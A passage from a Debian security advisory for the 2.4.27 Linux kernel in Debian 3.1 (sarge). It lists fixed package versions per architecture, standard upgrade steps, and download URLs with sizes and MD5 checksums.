     Motorola 680x0 architecture 2.4.27-3sarge5
     Big endian MIPS             2.4.27-10.sarge4.040815-2
     Little endian MIPS          2.4.27-10.sarge4.040815-2
     PowerPC architecture        2.4.27-10sarge5
     IBM S/390 architecture      2.4.27-2sarge5
     Sun Sparc architecture      2.4.27-9sarge5

The following matrix lists additional packages that were rebuilt for
compatibility with or to take advantage of this update:

                                 Debian 3.1 (sarge)
     fai-kernels                 1.9.1sarge5
     kernel-image-2.4.27-speakup 2.4.27-1.1sarge4
     mindi-kernel                2.4.27-2sarge4
     systemimager                3.2.3-6sarge4

We recommend that you upgrade your kernel package immediately and reboot
the machine. If you have built a custom kernel from the kernel source
package, you will need to rebuild to take advantage of these fixes.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge5.dsc
      Size/MD5 checksum:      831 b970d762bf162cdfc8df32549bbdd566
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge5.tar.gz
      Size/MD5 checksum:    32299 1007b0e6ba417ea12969e495056b2d5e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge5.dsc
      Size/MD5 checksum:      840 381052d0f0e53b867b8190d9bf0e0d1b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge5.tar.gz
      Size/MD5 checksum:    34450 4fe66843eb3dde9636a292726b0720ca
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge5.dsc
      Size/MD5 checksum:     1581 f670c9495d1e6b3fc0dae34079be2703
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge5.tar.gz
      Size/MD5 checksum:    99762 689742b819b03635be81e56f236f015b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge5.dsc
      Size/MD5 checksum:     1143 aa5d275cbb5e611a430558c75d2ddce6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge5.tar.gz
      Size/MD5 checksum:    55593 e8517a3876c679cf01ccdbdaf666c4fd
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge5.dsc
      Size/MD5 checksum:      876 7416f4d8d7d4d468977f966d6cb680da
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge5.tar.gz
      Size/MD5 checksum:    12864 5d32bbaecfcef58ac406939346922caa
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge5.dsc
      Size/MD5 checksum:     1074 cf00f7439b32b998ac35cf9bc0ba17ce
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge5.tar.gz
      Size/MD5 checksum:    24784 bb76d31c4e97594546a1ce46205627be
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge5.dsc
      Size/MD5 checksum:      832 61fe3968d2b8e2a0ae27d86bdadd82dd
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge5.tar.gz
      Size/MD5 checksum:    10570 982fd40704097c18838e3954de9d946e
    http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge4.dsc
      Size/MD5 checksum:      732 ea5120c744a0c6680bd77bc262018e6d
    http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge4.tar.gz
      Size/MD5 checksum:    18921 f898a597de3f981b99848160f092f06e
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge4.040815-2.dsc
      Size/MD5 checksum:     1051 007ebb5db36532e0bef9462411d7a25b
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge4.040815-2.tar.gz
      Size/MD5 checksum:   309221 e9154cdadd12cf9d3042fc3c69906796
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge5.dsc
      Size/MD5 checksum:     1131 6b22f4ecad2ce3d2404d606c77da9dc7
    http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge5.tar.gz
      Size/MD5 checksum:  1464751 d1891087138beef4e77784e3b29230b5
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge5.dsc
      Size/MD5 checksum:      900 6b7eaed1211e79eeb7822c470588dc10
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge5.diff.gz
      Size/MD5 checksum:   755526 437a36887a3730d49c6681e163085c91
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27.orig.tar.gz
      Size/MD5 checksum: 38470181 56df34508cdc47a53d15bc02ffe4f42d
    http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge4.dsc
      Size/MD5 checksum:      750 49de53f3e66da5396a7c447411eda404
    http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge4.diff.gz
      Size/MD5 checksum:     5089 400dd7c2ce12ba55e876cb90a035095f
    http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27.orig.tar.gz
      Size/MD5 checksum:     9501 a4ad085824ade5641f1c839d945dd301


  Architecture independent components:
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-doc-2.4.27_2.4.27-10sarge5_all.deb
      Size/MD5 checksum:  3581076 e1bbfffc57dbdfd0b9cd2d0a66a7744b
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-patch-debian-2.4.27_2.4.27-10sarge5_all.deb
      Size/MD5 checksum:   710724 9535988810d9c8f3f4019720bd49a30b
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge5_all.deb
      Size/MD5 checksum: 31034148 28894dd804436675aedfc296a8ee4d63
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-tree-2.4.27_2.4.27-10sarge5_all.deb
      Size/MD5 checksum:    27696 90eb280799013da95a3c1188e8b84d50
    http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-doc-2.4.27-speakup_2.4.27-1.1sarge4_all.deb
      Size/MD5 checksum:  2420804 1a05dca524994806146a6900efa71899


  Alpha architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-build-2.4.27-2_2.4.27-10sarge1_alpha.deb
      Size/MD5 checksum:     5690 26d3f171f62b80b0b8e978652f8f485a
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-build-2.4.27-3_2.4.27-10sarge5_alpha.deb
      Size/MD5 checksum:     8074 4f676244465a1b8492343ffc27de9b7b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-2_2.4.27-10sarge1_alpha.deb
      Size/MD5 checksum:  4572104 d92c8a0b7398b6b41d52c7a55a3d88f1
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-2-generic_2.4.27-10sarge1_alpha.deb
      Size/MD5 checksum:   270932 be9e18785e87f29f8632a9fc973b0bbb
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-2-smp_2.4.27-10sarge1_alpha.deb
      Size/MD5 checksum:   272886 dea691efa19f4b82691124fa62e8963f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3_2.4.27-10sarge5_alpha.deb
      Size/MD5 checksum:  4574778 a40c45730f344deb8cfcc1d1a7ad2488
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3-generic_2.4.27-10sarge5_alpha.deb
      Size/MD5 checksum:   273276 95820aca7779957cdc5b380de2241a4d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3-smp_2.4.27-10sarge5_alpha.deb
      Size/MD5 checksum:   275206 01567b6608388db6ecbea1a4cfa5a99f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-2-generic_2.4.27-10sarge1_alpha.deb
      Size/MD5 checksum: 16516634 eb2e92ade4debc9bfdedb40134b3efd6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-2-smp_2.4.27-10sarge1_alpha.deb
      Size/MD5 checksum: 16970506 2b58db598e31823c08f993da80ab10d0
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-3-generic_2.4.27-10sarge5_alpha.deb
      Size/MD5 checksum: 16531732 f6b0507544d219740e11894d49906179
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-3-smp_2.4.27-10sarge5_alpha.deb
      Size/MD5 checksum: 16983616 735c022a0d097f46a03348fe91a6e7ac
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_alpha.deb
      Size/MD5 checksum:    20480 505188720fcfed347602c30bb1cd5f6c


  ARM architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-build-2.4.27_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:   483596 fe85544eabe959ce72f05dda8d65185a
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-headers-2.4.27_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:  4726650 4729ca286f8e2314f6c5cdfaefbe93aa
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-bast_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:  1695008 4beae00e1c3e83463a772fe17aebc80f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-lart_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:  1059362 ee2f850805f19c7fdfdb8c866566cc56
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-netwinder_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:  7376966 26755e712c14e0003b0d599ccc1bac98
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscpc_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:  3165708 f673a41f1403e7a85e9cdbfc6cffb23b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscstation_2.4.27-2sarge5_arm.deb
      Size/MD5 checksum:  3687138 022d79de206311aa2364e5449915a94d
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_arm.deb
      Size/MD5 checksum:    18868 b0530590361123733515d0cd21bb01c9



  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-build-2.4.27-2_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:     8224 ae479d6dbd6c171e94a25e5b59b4243f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-build-2.4.27-3_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:    10534 c2e539824425af065b4617aa3589b782
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:  1823160 c058363ae7646c370f77d620c6bb6438
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-386_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   297168 19b508f76e107d8cf988560b3fd04a8b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-586tsc_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   298340 073efbc2d728e4ee3b30e980d2d0f5e6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-686_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   298200 94f48b9438f8e100590c8874b3c05e0c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-686-smp_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   300156 1143aa70f66386bf4789431e80810b2d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-k6_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   297050 44f3d785ad2c70829373321327e6e3e6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-k7_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   297978 7795ea75d534ded9d2a7ade27fc3cf21
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-2-k7-smp_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   299650 9676b8d779e9dd09f0583d950e2fd2d5
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:  1825394 6ca7de755e3890e989cfaa2271a0ba3d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-386_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   299390 5973792d7e12022780b7d4d51e1f2372
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-586tsc_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   300664 948a088ae36738d5de11375009a162b6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-686_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   300562 620f476d04bfe3a906b9110d9495f902
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-686-smp_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   302114 14db999e3504855ab0239341e41b8d0d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k6_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   299548 6b842b2221e6afa94332d6e2e434f5e2
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k7_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   300286 483ea0ad7316d1c82e1d667d8826d536
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k7-smp_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   302128 d5f9b05985e032d4ce522283566b0fdd
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-386_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 11046010 e32bdedde43897d24792ce5199c8e428
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-586tsc_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 12024834 edfa4a6008fde7599fbd7e5081cc2bb9
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-686_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 12336042 d2c1f84d0c771fa8de10c87e0cb35e70
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-686-smp_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 12679824 4ab0ad4ca8bf76e6614768cee8245c24
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-k6_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 11708878 7842c8dfed5e6c2cbbed136807b5cf7f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-k7_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 12083292 b45dd7f50ef9f4726711c4af87368037
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-2-k7-smp_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum: 12415392 b56e1c928e816d53f6cba41f0138e91d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-386_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 11052302 255d69882c14e9a92cf951b2fff9263f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-586tsc_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 12036374 f576550eacb4d17f1388b89ce9615f06
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-686_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 12355204 cd85e4ca2b25cecddd0077b4eb47a0ce
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-686-smp_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 12695118 31480c61a3ac3c71d4a1b9703b8d8139
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k6_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 11723728 3e4e06b330cd1ac479769baac326df7b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k7_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 12098618 541559dcbaa99bbd02642fe31b063ffd
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k7-smp_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum: 12434342 5813dbe009eea4141a872752874f0335
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-386_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   267586 95d23b87e054f0a8dc82edd6a7f51f60
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-586tsc_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   292452 d090775026be223c949e0f86f5b1f646
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-686_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   298278 f8cc95014790c87b62bf81b2b2d2d674
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-686-smp_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   303840 f1362454b42361047297b1ef7f90769c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-k6_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   286252 d67de5ec744bad676981089e5623561c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-k7_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   292100 0ce7cff58a32eb924199a652062a7e9f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-2-k7-smp_2.4.27-10sarge1_i386.deb
      Size/MD5 checksum:   296978 fdb699b60e0d3ae5fa4df76e0203c603
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-386_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   269980 77410fc804084d2169ceb1319a9e690f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-586tsc_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   294862 b6270e45a1acfc537b6d9ba474e163d7
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-686_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   300698 939c08139e1e17f754d9d676ca3f9c04
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-686-smp_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   306442 507f4d8c295e1c4549b06ded67009b98
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k6_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   288692 900499f7b356261f9859d051c96a54e8
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k7_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   294624 64620786d42099ead5e5bdb829f7c573
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k7-smp_2.4.27-10sarge5_i386.deb
      Size/MD5 checksum:   299512 6a06f4d16650536bdcd1dd7f44851a3d
    http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-headers-2.4.27-speakup_2.4.27-1.1sarge4_i386.deb
      Size/MD5 checksum:  4773910 8c3955d4fa6d3af721c7d820a2e9d5a1
    http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-2.4.27-speakup_2.4.27-1.1sarge4_i386.deb
      Size/MD5 checksum: 11308946 ac2eca7ddc6e0fcfa0b7d835b28d3c41
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_i386.deb
      Size/MD5 checksum:    16632 bab2d60567d5858c019407cca58d6688
    http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge4_i386.deb
      Size/MD5 checksum:  7775346 31814a4d66ec8053772ad147a4a62b26


  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-build-2.4.27-2_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum:     5190 00c8fff6af32adf62f8c91794745931b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-build-2.4.27-3_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:     7486 b40d48a972ee0cb277b63a649e0d01f2
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-2_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum:  4678756 01467522c3106fab54cf6983a9c6487d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-2-itanium_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum:   239184 cd07eff9264141e6ddbd015f5f76e99e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-2-itanium-smp_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum:   240504 03b131531af57cd2f46cf8ff8ba93f45
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-2-mckinley_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum:   239212 457102e92a389246447410ce172bbd2f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-2-mckinley-smp_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum:   240498 66cc452b54b87366d7755da6693aa76c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:  4689752 b5ef21aee13412359cdb7fb5e039de74
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-itanium_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:   242570 3dbd1ce3bbfed1c7c4aeb3de2396cf77
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-itanium-smp_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:   243234 14ed081560b4008f6e391b325b39544f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-mckinley_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:   242366 4acf18300727b24afe4f223623e5c44d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-3-mckinley-smp_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:   243558 f48e9a34ea714966024f24277293d1d6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:     7262 4cc86fa5dd7f157ab7fa3747f9ac8573
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium-smp_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:     7274 7b6dec36049b6f277b72c2c6a24dd538
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:     7290 00cf535d95cb5a827d53219de9d2b0a1
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley-smp_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum:     7302 093e0825e05675fd728a7db694531f1a
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-2-itanium_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum: 16665798 0dfd99eeb9d1c8933ec71f0cdc80a71e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-2-itanium-smp_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum: 17023766 09ae0a0c0b133abe047cd50b8e09f02e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-2-mckinley_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum: 16623970 2b70e151d5c13c89d7646dc01d28a277
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-2-mckinley-smp_2.4.27-10sarge1_ia64.deb
      Size/MD5 checksum: 16970478 affcf0503482e489ae8384b3d7279fce
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-itanium_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum: 16677620 d997c6d47e3592b0ab8c82917548102b
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-itanium-smp_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum: 17037020 75b4b47d8ebd8cd91327cfeaf76dd0d9
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-mckinley_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum: 16630570 11c5c2ea12f3cab5865b225f765d71c0
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-3-mckinley-smp_2.4.27-10sarge5_ia64.deb
      Size/MD5 checksum: 16988538 f8b022aa39e91bccc24ab3adaab2c7aa
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-2_ia64.deb
      Size/MD5 checksum:    22224 a4d38a63b6bd0399aa84d50d23f09cf6


  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-amiga_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2642370 64f44bc3e9c3313cb7aecf789ddb51de
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-atari_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2545710 6dcdfedd3356d0f20e7899da7a7ff2bd
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-bvme6000_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2396790 5d278c185e1ca1d34e65dc657cbcbe96
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mac_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2478704 181df694d051555f0253ff27e9f0863c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme147_2.4.27-3sarge5_m68k.deb
      Size/MD5 checksum:  2326206 033f694ed1a6acc24efb07ecdbbe125c
